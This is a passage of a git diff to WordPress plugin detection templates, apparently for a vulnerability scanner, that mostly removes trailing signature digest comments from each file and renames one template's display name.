b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef352978cd787cb7966313e2ab6f27de7fb91ede5b3017180015f0249baad60602200fcd589a4c3c4083dd778ac320e00b7917069e6f75967129e49be1895f02d754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 7d76cd5965..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb1e8fbfe6d296b9cff5e0acfaa9f049b14cd5d473741ed59910a57eb02ba3a302202526cfe4ee39b175ae024d9f94561c2d763b88a24e8c8a982fe32cc9a5cc7430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 24d02d6e87..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220616555c2fe19ef84dff617dec3efc7de66e9dc15f2671c485470652640479872022100a5722db82d6de378132a458f427a104fc8e9ee822e8fa7517e2bcd8c33499b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 97f6b92abb..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095e2bcc157a54700af0a2ddaa160a6f47e38bf0cefbdbfbe1035c400a888d21002200e98d2c7f526d64286580146da0615d92c2b2fa426c80589282284b5230e1dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 726d86e9f9..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b6eb57784dd16537369876b2ff5f11a65ccf77ba38a75106021af81d25b264bd0220069806d282d36c29fe5b6e0897d1b4a5847bc2fcd7b1f132dbc98e16d35d154a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index dcf8274756..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e9635e8264045d6b5083462c542cbbd5ca7640154f008e7dc67654784ab949d8022100fcec7ed0c747447e9d14cfd98dd735474fb2360fb00087bdf5faa05973d3ad8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index ecacdb57bc..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1cfa5e4d81eb9db57fa9e3aa32f660817a2000011eb508e96bad8e7d6c60d47022100bbb559f9eb9b3a190a7e829b9e0fc05b1adf209e504510d4b5034155be855486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c4ad2e3a9b..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201808b1eae26c3a7ce14636373d02ce88d4282a466b1948c98146e8d0373bec70022100af2754f8db6f9e6afff6135f0c464f587da4a09ea27d84edcc03f56491441934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 46d2e51287..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201966318daf97e10fff4b9b2df130c67bbc1d1c0fbcd03a5145d6c29d32c5fc78022100c4976cb6521a92c66c8775b15e74910a0536600e0b4a2a6a7086a8ae2001afac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 0843edc8f7..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af693881ca89da4aae59fe2e8d7033d71e25a1abe64e7652146b2242257193be022010ea666c2f7bc81ebd2474b0acd35fafc279ba97f38ae8f9ec8687a99574ef58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 7f4e4a38ae..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022014718c96e441c1b9e4962a7d5c29bd84bb08ed78bcf9b0b82dc13414720017d7022100d4f980f90670b3c7fec89b1c1f19ed4611b0f63b4fd57dec03c06489927fe019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 6b4c27b3d8..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004901fbd41d0ecc2f2645b68a3edc9b905e62e20d1116ff745f3d4d5c0b01689022065ba3e0371cd96c0398a91eaff70c34a3f19351658efdeda49cafe574f0a606e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 9d7774de22..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cc8ad83e63310558442d79e957d6587a485362e8d5a7c546b261b43b3f2dbe0022100b7b02f36ed0c0578dd2db1855071d3a66eeb140e18f4d0526c61a33f930c3575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 1ecb509f7f..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095818d15e7e1c51908b2017bf5dda59a9be8e26ef8f9d794b34f81b3730d5250022075b4d11d7fb2e544aae98ad0b6fc9e2ebed806eec47c145ef4bb19764f851703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 1b8a36e56d..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b6af8acf20eb9a85308df1379870d1ce32e55f0abaf492548c948da5e2aa08a0220694e3b0bf84dda2f44a1ef824ea9ced1292906eb8083c6a918f1e5978b4f3fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index cadfd01714..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220673064845a91119352b8388cc376bb6e062bd24c4dbd463c9cc373359a7a021d0220762888352cab5dc1f92e526cfd9b99493e2ea02cf19b26365e84dd881fd149fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 341287c9e1..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -1,7 +1,7 @@ id: wordpress-templately info: - name: Templately – Gutenberg & Elementor Template Library' 5000+ Free & Pro Ready Templates & Cloud! Detection + name: Templately – Elementor & Gutenberg Template Library' 5000+ Free & Pro Ready Templates & Cloud! Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e3d47731d765ee71c9ed9a3ffa2b24ace9cb710e6fa4fa90e904fea5b25643c022100d7d84692f10f9f6b087c8cf94b956743b20a86e67177ffe6f3a33b133cafc96e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index bd1098f136..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b2c874ca7fb5f89f3f10ec4b11096110eb65da9e98f25b34461db71cc880b970221008f445b3582a68a4384218b33d1fc56f6c2af14e9332cfbcd02e915e76442fd58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index e90db8cea2..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e562c838d0afc3cca8828b3ae82835a394cc7336e223917e7a4c5e01a55c4caf02210084d2d40d382a9a4e73aad1a59fcf1c0fb1cb2d29f37f30580d4c436bc097643a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 8f1442bc1e..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085e144ebe09401f0860ff9262782d84d42a2eec9fce55d1b80876600dafa80f30220326f9c0cd33c594772b649de5f21128ff0e88ff442644557f6b3bde9e9be5859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 13e6b533b8..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b69294d21efbeacaf8dcf5de3aaad83ee56b8914a37970eda8a31d40fa56088c02200cad8e84ad0783bcd93d9cf6ed2fd5f823e0a44ebe3be6f918e16576b9058743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index a49996809d..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203edc693f651430a53787cec4139841df283ded63caedca100e85d74d781475dd022100e8bf1b77ef4c1f546c40fed357acb0bba24edc3f8bf43d55503cdb0106f4331d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 86133f776f..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e82048a94760e290fc58b06038f4a5a7ec7d9f650560fd5a9cc18e09ed449e13022100a3465fdc16589410f371ca4f5962036eadbecbb06d79b2bc0db6c7c769e087bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index eda6319997..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201f546e30cbcbc256285303254c5ed5cff76a3dd7a2bdf3fc413ce4013a262ebb022100caa49bf2c964fbb00086cb167f758b1a9c9e2fb61f1db78010971a6c4e5025e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 826f7d8b66..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069c60f6305660b2b3a0312729c97b0ac394e4fdef0782aaacbd4e27b6e36b14f0221008fd5cae9a48a0382c3ac0d245898d02c5c6caf0808abef87491c5c97d056ded1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 65c11b3422..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d6707556020e7434d5554f3ccc3c6445aeaf934b9485df130951482870ca76e5022100f6a7908858d413cf096d08c2ae2057ed34a0405a684251fcadcd2cb85e1fa145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 6e50bc1404..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5b37cb0892154113671d5114242fa788a721615c2c8289424dd537bd5d1932c0221008cb14ae51dda6f5c3b6243d4dfe69a3e52984d261ed6276c3522c3a9cf9f5134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 45262f7340..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e4ec0d08de6d47fbc299a22a289ccd74e515ebe94e3178674840028b40d19200220566318575fb3f1e85f9fdf1fd871327fc371ac3c65c80d4a598a57c9f94ca0f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index f45a438e40..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062a93088fe25103a4e0e9b75599455fdcd739914a818f83bc52c0e06d4b06a420220221ac7e0a0aa2849a1b1f72bd133a5c5955e416bc1f4294066a0592296b82dcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 14505ca911..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100acf7013c8f9c9faaaca7f585991b49534d00832440e2f9c4a65ca85792a8df6b02206d5527ac39a0b8786be011644d0e2ee3fdc29ef7163c8443b55f35ad5c4a2a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 68657c9af9..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058d2d8fb42fb3932dcb340bbcf41c00241c9856179a9be9964ee8971a8675895022100dfa379ecf00e0972a11c489d28219e884a1487dd7f55e940a12c1cceb2efdc6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a441a9038c..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7719008ee6655fd674a8f5754dbb4cbb94259157d2b15fbb2fe651f2246c90c0221008199f9bd2e2e2c402c2a1e4512717ba3d46cec0a2d639006b443a0e94f032e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index a4d82d9f4f..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008aee7f7412013f95a1c73e4128d2ce63a640a9a0d3b1c0abffe2734858199851022100e0364b110f6242be1184e4051a12c99b302a3038e0ce359479753115de72073a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 53d5907fa7..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9c2a0b45c1c059201286f2edf3493121a41284a3b08b548b0ffba2cd0af495202203d97fcaab9f6ebdffc8b6ea327eba4104f97de855b60424555b45fc60b438005:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 93718180af..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac049911eec8229c0a6b272077d959fe3a3019db461a28c6b224e48d804b8b6b022100a06830adee7ee99705836d70a35ee3e766176e62ecdfe443aa1a5afb89610cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 5735b0c39b..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100843e4d6cb7d4a570e548e402c61c4a2eaea5731939d620105eb161e102a8dde202203df7e9d0d33fffbb8d1e0ece5f60898b809605760f255bbf99e0911ff91ef851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index ee2d0fbc6a..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f276c57a57d0f222d0a7ceb0613eb7287da33b602ba28af09802db4720a87cf70220073ff02d110b32856c063494eb4a88c85b028df62366da62ceb111622cc5ea2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e1c63521aa..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200f2f827f5ba70a7f9b69e0af11a1268c82b07fbac66b887dae6974b343084197022100c892272f04f4017c27fb857995e5148181d28accbd5baeb9978394edad4b7233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 168fe2a84a..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e78cb7493d811e1f644469f09586bb68a5904b82ed8893e617bc0460ef15a21022100f4399115613d9f3cb9a89434f658d1e1e6efc6caa5fb5b2b5eea4daa7284bf6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 4e778e70d4..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055090c452a4e1c00bce02cd115085eba262336a32d779ff6d3fb330a244bcb2902203d806ec592b96d9eee5b9e1f7dbc3f118a72d67187ce34c4c59a5d46fe458736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 1ae6610241..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c5e65aaeeb0358fa326f598e24b62d0fbea59e7ec0f4a2fd8331693fab4219a02202d52748eb369a290713bd6e000b7a9f716b5bb5820f6632467ecece6420281e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 87127ee06e..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009dfd02fb0065bb01d2c809844cb913ace1a51f3a27cfd466e49968845e8fcf370220424b8bcc5e1524d74e2c407777d97c0446674ab3a067571c7bf65d3362730faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 802176a6f9..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e12594e3dd9f6f8f59f993e16368a397c88257375a507a61d65cf218346f5af022100b3a6dab066176c8142958d8b08e7c08ae545bea00eefef9c199811141195de51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 5a7b337328..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207574f851b4ea5cb3448b1301acbd81a44b09e7fcfbfd341ef680a44dea630229022058d84dbd07cd530bfadd25493eef59d27f9ad8c72ad101089fb78cc790947cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index aefa11783f..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c33ab9a31d9c797e11298547605a2efb1c4d730bdb46544481174b8ae8620bcb022100ee6bdb6f99dea48a396fe239c9873090bea470576fff51cf49eb2e79fa52184c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index feabdfd1dd..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203df8304ab0b06bef72797f798f661fc2b62bf6e1ad115e53f11397884c300b5e02203d537c30b823070c36b56abb8774b541d5fd49eb2c312f6bd1adcd357401c8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 23223d2839..10dad2d2fb 